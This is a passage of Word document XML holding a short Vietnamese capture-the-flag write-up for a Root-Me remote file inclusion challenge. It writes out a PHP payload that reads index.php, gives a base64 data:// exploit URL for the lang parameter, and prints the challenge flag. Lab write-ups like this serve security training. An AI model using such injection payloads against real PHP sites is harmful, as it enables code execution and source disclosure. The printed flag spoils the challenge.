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2BE0E" w14:textId="41E08C26" w:rsidR="00FC48D1" w:rsidRDefault="00FC48D1" w:rsidP="00FC48D1">
      <w:r>
        <w:t>Đầu tiên vào trang thấy trang không filter url, ta tạo payload tấn công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5361B0B6" w14:textId="2977E040" w:rsidR="00FC48D1" w:rsidRDefault="00FC48D1" w:rsidP="00FC48D1">
      <w:r>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C5095C" w14:textId="1EE3191C" w:rsidR="00FC48D1" w:rsidRDefault="00FC48D1" w:rsidP="00FC48D1">
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:t>content</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = file_get_contents('index.php');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5305070E" w14:textId="10C66E00" w:rsidR="00FC48D1" w:rsidRDefault="00FC48D1" w:rsidP="00FC48D1">
      <w:r>
        <w:t>echo $</w:t>
      </w:r>
      <w:r>
        <w:t>content</w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5712F502" w14:textId="01C091C0" w:rsidR="00C54FA4" w:rsidRDefault="00FC48D1" w:rsidP="00FC48D1">
      <w:r>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A42CF8" w14:textId="523A1732" w:rsidR="00FC48D1" w:rsidRDefault="00FC48D1" w:rsidP="00FC48D1">
      <w:r>
        <w:t>Chuyển thành base64 và tạo payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1998C849" w14:textId="607D7C34" w:rsidR="00FC48D1" w:rsidRDefault="00FC48D1" w:rsidP="00FC48D1">
      <w:r w:rsidRPr="00FC48D1">
        <w:t>http://challenge01.root-me.org/web-serveur/ch13/?lang=data://text/plain;base64,PD9waHANCiRob21lcGFnZSA9IGZpbGVfZ2V0X2NvbnRlbnRzKCdpbmRleC5waHAnKTsNCmVjaG8gJGhvbWVwYWdlOw0KPz4=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4912C64F" w14:textId="555F4DE1" w:rsidR="00FC48D1" w:rsidRDefault="00FC48D1" w:rsidP="00FC48D1">
      <w:r>
        <w:t>Thực hiện gửi lên trang</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443B8871" w14:textId="6C2B658E" w:rsidR="00FC48D1" w:rsidRDefault="00FC48D1" w:rsidP="00FC48D1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D679850" wp14:editId="3900BBA4">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="297470610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470610" name="Picture 1" descr="Graphical user interface, application, Wo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3F6C4" w14:textId="0968503E" w:rsidR="00FC48D1" w:rsidRDefault="00FC48D1" w:rsidP="00FC48D1">
      <w:r>
        <w:t>Kiểm tra và ta có flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DB1040" w14:textId="31DCBEA2" w:rsidR="00FC48D1" w:rsidRDefault="00FC48D1" w:rsidP="00FC48D1">
      <w:r w:rsidRPr="00FC48D1">
        <w:t>R3m0t3_iS_r3aL1y_3v1l</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00FC4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AF1"/>
    <w:rsid w:val="004E0AF1"/>
    <w:rsid w:val="00C54FA4"/>
    <w:rsid w:val="00FC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1618B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C6C5721D-C498-49FF-9B70-31519B42C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48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48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Anh Kiệt</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Võ Anh Kiệt</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-14T18:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-14T18:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>